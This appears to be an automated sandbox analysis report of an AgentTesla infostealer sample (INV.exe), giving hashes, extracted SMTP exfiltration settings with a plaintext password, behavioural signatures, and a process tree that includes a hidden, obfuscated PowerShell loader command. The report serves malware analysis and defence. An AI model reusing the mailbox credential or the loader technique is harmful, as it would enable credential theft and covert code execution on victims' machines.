Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
11-06-2024 18:31
Static task
static1
Behavioral task
behavioral1
Sample
INV.exe
Resource
win7-20240221-en
General
-
Target
INV.exe
-
Size
629KB
-
MD5
7c37ca93ea31895ae8c37b5086aafb5f
-
SHA1
36ec354b8f559c44ac1a45d9bbe56ee8dbf883db
-
SHA256
edd8ae87a81a2627e70d3df6bbe1a7185c8045bc4ef9624c5f2b8487d86dbd73
-
SHA512
852e0315d1930b9dcb85c7d649c2e0524eaee1ed287d21be6dbb37a27151e200236237b9d9490bc3453bf01ac2baf1e695c83e88484fd5a426482772d52fe864
-
SSDEEP
12288:mgS5y5R7+SyRps33QjMEVyhxLBDulZ7+OibPNL5lNXKVLbziXMOvrxdRnh457ks3:65yH73QbyLlDu3C/lNXKL3i9v3Idke
Malware Config
Extracted
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
vjru ncjq zilj zxwk
Extracted
agenttesla
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
vjru ncjq zilj zxwk - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 1 IoCs
Processes:
Fugninger.exepid process 4112 Fugninger.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 api.ipify.org 24 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
Fugninger.exepid process 4112 Fugninger.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeFugninger.exepid process 2120 powershell.exe 4112 Fugninger.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2120 set thread context of 4112 2120 powershell.exe Fugninger.exe -
Drops file in Program Files directory 2 IoCs
Processes:
INV.exedescription ioc process File opened for modification C:\Program Files (x86)\Common Files\firbens\psycholeptic.ini INV.exe File opened for modification C:\Program Files (x86)\Common Files\boltholes.obl INV.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exeFugninger.exepid process 2120 powershell.exe 2120 powershell.exe 2120 powershell.exe 2120 powershell.exe 2120 powershell.exe 2120 powershell.exe 2120 powershell.exe 2120 powershell.exe 2120 powershell.exe 4112 Fugninger.exe 4112 Fugninger.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2120 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeFugninger.exedescription pid process Token: SeDebugPrivilege 2120 powershell.exe Token: SeDebugPrivilege 4112 Fugninger.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
INV.exepowershell.exedescription pid process target process PID 624 wrote to memory of 2120 624 INV.exe powershell.exe PID 624 wrote to memory of 2120 624 INV.exe powershell.exe PID 624 wrote to memory of 2120 624 INV.exe powershell.exe PID 2120 wrote to memory of 2164 2120 powershell.exe cmd.exe PID 2120 wrote to memory of 2164 2120 powershell.exe cmd.exe PID 2120 wrote to memory of 2164 2120 powershell.exe cmd.exe PID 2120 wrote to memory of 4112 2120 powershell.exe Fugninger.exe PID 2120 wrote to memory of 4112 2120 powershell.exe Fugninger.exe PID 2120 wrote to memory of 4112 2120 powershell.exe Fugninger.exe PID 2120 wrote to memory of 4112 2120 powershell.exe Fugninger.exe PID 2120 wrote to memory of 4112 2120 powershell.exe Fugninger.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\INV.exe"C:\Users\Admin\AppData\Local\Temp\INV.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Fleapit=Get-Content 'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Demulsification\Legitimistisk.Rac';$Replevy=$Fleapit.SubString(51921,3);.$Replevy($Fleapit)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵PID:2164
-
C:\Users\Admin\AppData\Local\Temp\Fugninger.exe"C:\Users\Admin\AppData\Local\Temp\Fugninger.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4112
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD5e7abb67ce4fba756d35ab5e6dccc3e88
SHA14bc08748d926a51c7a6f0fa60a87579f130829e1
SHA2566063bd1c9f0bf59ce14856996908cc8eaba317bdedf2da271da223a09040a1bd
SHA512c7c86ad5838ef6e861d06b987a5e1b5dc38fd399ee1b42bec8e5b6a60e473d18449e5baa5264503660eead4b53a439f6142c7e2e30639d2457fde9e8c2ea227b
-
Filesize
311KB
MD5015664a0e6110b59cd0f52fa4aea9e9a
SHA101bb36fa054704ec6fec55856a93498127ab30d0
SHA2567d950d49a8c2526bed81c4357ed6b6998030a3a3adfa27c29e3b0281a28ed7c7
SHA512a37a7efe9863da2e44a984a6afc1b15e3eac95ca734bcebf68b4d453dd685a7735e0a0a1b837f641b1f1c0ba0da2002e39427ff4960f863cdec2fc3c3787a63d
-
Filesize
629KB
MD57c37ca93ea31895ae8c37b5086aafb5f
SHA136ec354b8f559c44ac1a45d9bbe56ee8dbf883db
SHA256edd8ae87a81a2627e70d3df6bbe1a7185c8045bc4ef9624c5f2b8487d86dbd73
SHA512852e0315d1930b9dcb85c7d649c2e0524eaee1ed287d21be6dbb37a27151e200236237b9d9490bc3453bf01ac2baf1e695c83e88484fd5a426482772d52fe864
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82